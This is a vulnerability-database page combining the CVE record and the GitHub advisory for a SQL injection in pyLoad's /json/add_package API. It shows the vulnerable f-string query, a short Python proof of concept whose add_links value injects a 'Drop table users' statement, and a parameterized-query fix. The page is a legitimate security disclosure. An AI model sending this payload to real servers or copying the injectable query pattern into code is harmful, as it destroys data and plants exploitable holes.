cve-2025-55156
Vulnerability from cvelistv5
Published
2025-08-11 22:21
Modified
2025-08-12 15:49
Severity ?
EPSS score ?
Summary
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter
References
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-55156",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-12T15:49:23.306603Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-12T15:49:56.057Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "pyload",
"vendor": "pyload",
"versions": [
{
"status": "affected",
"version": "\u003c 0.5.0b3.dev91"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-89",
"description": "CWE-89: Improper Neutralization of Special Elements used in an SQL Command (\u0027SQL Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-11T22:21:52.225Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf"
},
{
"name": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f"
},
{
"name": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271"
}
],
"source": {
"advisory": "GHSA-pwh4-6r3m-j2rf",
"discovery": "UNKNOWN"
},
"title": "PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-55156",
"datePublished": "2025-08-11T22:21:52.225Z",
"dateReserved": "2025-08-07T18:27:23.306Z",
"dateUpdated": "2025-08-12T15:49:56.057Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2025-55156\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-08-11T23:15:26.850\",\"lastModified\":\"2025-08-12T14:25:33.177\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"pyLoad is the free and open-source Download Manager written in pure Python. Prior to version 0.5.0b3.dev91, the parameter add_links in API /json/add_package is vulnerable to SQL Injection. Attackers can modify or delete data in the database, causing data errors or loss. This issue has been patched in version 0.5.0b3.dev91.\"},{\"lang\":\"es\",\"value\":\"pyLoad es un gestor de descargas gratuito y de c\u00f3digo abierto escrito en Python puro. Antes de la versi\u00f3n 0.5.0b3.dev91, el par\u00e1metro add_links en la API /json/add_package era vulnerable a la inyecci\u00f3n de SQL. Los atacantes pueden modificar o eliminar datos de la base de datos, lo que provoca errores o p\u00e9rdida de datos. Este problema se ha corregido en la versi\u00f3n 0.5.0b3.dev91.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":7.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"NONE\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"NONE\",\"subIntegrityImpact\":\"NONE\",\"subAvailabilityImpact\":\"NONE\",\"exploitMaturity\":\"PROOF_OF_CONCEPT\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-89\"}]}],\"references\":[{\"url\":\"https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf\",\"source\":\"security-advisories@github.com\"}]}}"
}
}
ghsa-pwh4-6r3m-j2rf
Vulnerability from github
Published
2025-08-12 00:13
Modified
2025-08-12 13:16
Severity ?
Summary
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter
Details
Summary
The parameter add_links in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.
Details
- Affected file:https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271
-
Affected code:
``python @style.queue def update_link_info(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, ) ids = [] statuses = "','".join(x[3] for x in data) self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')") for r in self.c: ids.append(int(r[0])) return ids ```` statuses is constructed from data, and data is the value of the add_links parameter entered by the user through /json/add_packge. Because{statuses}` is directly spliced into the SQL statement, it leads to the SQL injection vulnerability. -
Vulnerability Chain
xml josn_blueprint.py#add_package src/pyload/core/api/__init__.py#add_package src/pyload/core/managers/file_manager.py#add_links src/pyload/core/threads/info_thread.py#run src/pyload/core/threads/info_thread.py#update_info src/pyload/core/managers/file_manager.py#update_file_info src/pyload/core/database/file_database.py#update_link_info
PoC
```python import requests
if name == "main": url = "http://localhost:8000/json/add_package" data = { "add_name": "My Downloads1", "add_dest": "0", "add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--", "add_password": "mypassword" }
response = requests.post(url, cookies=your_cookies, data=data)
print(response.status_code, response.text)
```
Remediation
```python def update_link_info(self, data): """ data is list of tuples (name, size, status, url) """ self.c.executemany( "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)", data, )
# 提取所有url
urls = [x[3] for x in data]
# 构建参数化查询,避免SQL注入
placeholders = ','.join(['?'] * len(urls))
query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)"
self.c.execute(query, urls)
ids = [int(row[0]) for row in self.c.fetchall()]
return ids
```
Impact
Attackers can modify or delete data in the database, causing data errors or loss.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "pyload-ng"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.5.0b3.dev91"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-55156"
],
"database_specific": {
"cwe_ids": [
"CWE-89"
],
"github_reviewed": true,
"github_reviewed_at": "2025-08-12T00:13:46Z",
"nvd_published_at": "2025-08-11T23:15:26Z",
"severity": "HIGH"
},
"details": "### Summary\nThe parameter `add_links` in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.\n\n### Details\n- Affected file\uff1ahttps://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271\n- Affected code:\n```python\n@style.queue\n def update_link_info(self, data):\n \"\"\"\n data is list of tuples (name, size, status, url)\n \"\"\"\n self.c.executemany(\n \"UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)\",\n data,\n )\n ids = []\n statuses = \"\u0027,\u0027\".join(x[3] for x in data)\n self.c.execute(f\"SELECT id FROM links WHERE url IN (\u0027{statuses}\u0027)\")\n for r in self.c:\n ids.append(int(r[0]))\n return ids\n````\nstatuses is constructed from data, and data is the value of the add_links parameter entered by the user through /json/add_packge. Because `{statuses}` is directly spliced into the SQL statement, it leads to the SQL injection vulnerability.\n\n- Vulnerability Chain\n```xml\njosn_blueprint.py#add_package\nsrc/pyload/core/api/__init__.py#add_package\nsrc/pyload/core/managers/file_manager.py#add_links\nsrc/pyload/core/threads/info_thread.py#run\nsrc/pyload/core/threads/info_thread.py#update_info\nsrc/pyload/core/managers/file_manager.py#update_file_info\nsrc/pyload/core/database/file_database.py#update_link_info\n```\n\n\n### PoC\n```python\nimport requests\n\n\nif __name__ == \"__main__\":\n url = \"http://localhost:8000/json/add_package\"\n data = {\n \"add_name\": \"My Downloads1\",\n \"add_dest\": \"0\",\n \"add_links\": \"https://www.dailymotion.com/video/x8zzzzz\u0027) or 1; Drop table users;--\",\n \"add_password\": \"mypassword\"\n }\n\n response = requests.post(url, cookies=your_cookies, data=data)\n print(response.status_code, response.text)\n```\n\u003cimg width=\"1599\" height=\"827\" alt=\"image\" src=\"https://github.com/user-attachments/assets/9bdcef37-59b8-4e60-a2b5-beb8a88c3202\" /\u003e\n\n\n\n\n### Remediation\n ```python\ndef update_link_info(self, data):\n \"\"\"\ndata is list of tuples (name, size, status, url)\n\"\"\"\n self.c.executemany(\n \"UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)\",\n data,\n )\n \n # \u63d0\u53d6\u6240\u6709url\n urls = [x[3] for x in data]\n \n # \u6784\u5efa\u53c2\u6570\u5316\u67e5\u8be2\uff0c\u907f\u514dSQL\u6ce8\u5165\n placeholders = \u0027,\u0027.join([\u0027?\u0027] * len(urls))\n query = f\"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)\"\n self.c.execute(query, urls)\n \n ids = [int(row[0]) for row in self.c.fetchall()]\n return ids\n```\n\n\n\n### Impact\nAttackers can modify or delete data in the database, causing data errors or loss.",
"id": "GHSA-pwh4-6r3m-j2rf",
"modified": "2025-08-12T13:16:38Z",
"published": "2025-08-12T00:13:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/security/advisories/GHSA-pwh4-6r3m-j2rf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-55156"
},
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/commit/134edcdf6e2a10c393743c254da3d9d90b74258f"
},
{
"type": "PACKAGE",
"url": "https://github.com/pyload/pyload"
},
{
"type": "WEB",
"url": "https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter"
}
Loading...
Loading...
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.